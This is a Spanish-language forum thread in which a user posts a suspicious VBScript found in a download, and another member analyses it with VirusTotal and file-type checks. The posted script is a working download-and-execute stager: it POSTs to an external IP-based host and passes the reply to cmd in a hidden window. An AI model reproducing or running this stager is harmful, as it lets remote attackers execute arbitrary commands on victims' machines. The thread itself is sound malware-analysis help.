Autor
|
Tema: Virus en vbs (Leído 3,667 veces)
|
xDark_R
Desconectado
Mensajes: 8
|
Descargando unas cositas me he encontrado con un vbs bastante interesante y me gustaria saber que hace, se que transfiere un script al disco duro con extension .au3 pero no he podido abrirlo para ver que hace, alguna idea? Este es el script dim Winhttps Set Winhttps = CreateObject("Winhttp.WinhttpRequest.5.1") gkpaeb1 = "http://82.111.231.133.static.cdnserver.in/" Winhttps.Open "POST", gkpaeb1, False Winhttps.Send dim Application Application = Wscript.ScriptName
CreateObject("Shell.Application").Application.ShellExecute "c:\windows\system32\cmd",Winhttps.responseText & Application,gkpaeb,"",0
|
|
|
En línea
|
|
|
|
Alvarito050506
|
Hola xDark_R, Actualmente la página http://82.111.231.133.static.cdnserver.in está caída, por lo que es imposible saber con exactitud qué es lo que hace este supuesto virus. El resultado del escaneo de VirusTotal no es demasiado "revelador", puedes echarle un vistazo aquí. Tal vez, si subieras el archivo .au3 que mencionaste, podríamos ayudarte mejor. ¡Saludos! Edito: Busca literalmente "cdnserver.in" (con las comillas y todo) en Google, parece haber algo de información por ahí. Seguiré investigando.
|
|
« Última modificación: 10 Febrero 2020, 00:44 am por Alvarito050506 »
|
En línea
|
|
|
|
xDark_R
Desconectado
Mensajes: 8
|
No se como subirlo, tambien he visto que esta caida pero lo he ejecutado en una maquina virtual y si que funciona.
|
|
|
En línea
|
|
|
|
Alvarito050506
|
Por lo de cómo subirlo, cámbiale la extensión a una conocida y súbelo a algún servicio del estilo MEGA que no examine los archivos (maldito Google Drive). Creo que MEGA incluso te deja subir archivos con la extensión que quieras. Otra cosa que podés hacer antes que nada es abrir el archivo con el Notepad++ o un editor hexadecimal (Bless, hexdump) y fijarte cuales son los primeros seis caracteres, con eso podés saber qué tipo de archivo es en realidad (saber su MIME Type). Con respecto a lo de la máquina virtual, , es algún tipo de protección que ofrece Cloudflare, pero no sé más qué decir.
|
|
|
En línea
|
|
|
|
|
Alvarito050506
|
Bueno, el código de la imagen es simplemente una manera "elegante" de descargar los archivos y ejecutar el script de AutoIt base.au3. Buscaré una forma de descompilarlo (las hay miles) pero, mientras tanto, ¿podrías subir el contenido del archivo %temp%\test.txt?
|
|
|
En línea
|
|
|
|
xDark_R
Desconectado
Mensajes: 8
|
No se crea ese archivo lo he ejecutado varias veces y nada, puede que lo borre después con el otro script (el .au3).
|
|
|
En línea
|
|
|
|
Alvarito050506
|
Hmmm... Interesante. Mañana continuaré con la "investigación" .
|
|
|
En línea
|
|
|
|
|
Mensajes similares |
|
Asunto |
Iniciado por |
Respuestas |
Vistas |
Último mensaje |
|
|
Japón desarrolla un virus informático para localizar y destruir otros virus
« 1 2 »
Noticias
|
wolfbcn
|
11
|
7,042
|
6 Mayo 2012, 02:08 am
por anonimo12121
|
|
|
DORKBOT: el virus de skype... QUIEN PUEDE CONTRA ESTE VIRUS???
Seguridad
|
arturo2552
|
0
|
2,241
|
13 Octubre 2012, 05:33 am
por arturo2552
|
|
|
Ayuda [Virus] Como elimino el virus que crea accesos directos en Usb
Análisis y Diseño de Malware
|
.:: KsV ::.
|
5
|
4,873
|
11 Noviembre 2015, 03:58 am
por s3tH
|
|
|
¿Es avast el mejor anti virus del mundo? El mejor anti virus es...
Seguridad
|
S0y 3l 4n0n1m0
|
1
|
2,196
|
8 Febrero 2017, 18:00 pm
por Randomize
|
|
|
**TeraBIT Virus Maker 3.1** (Creación de virus)
Software
|
**Aincrad**
|
1
|
2,761
|
11 Marzo 2018, 15:37 pm
por planck669
|
|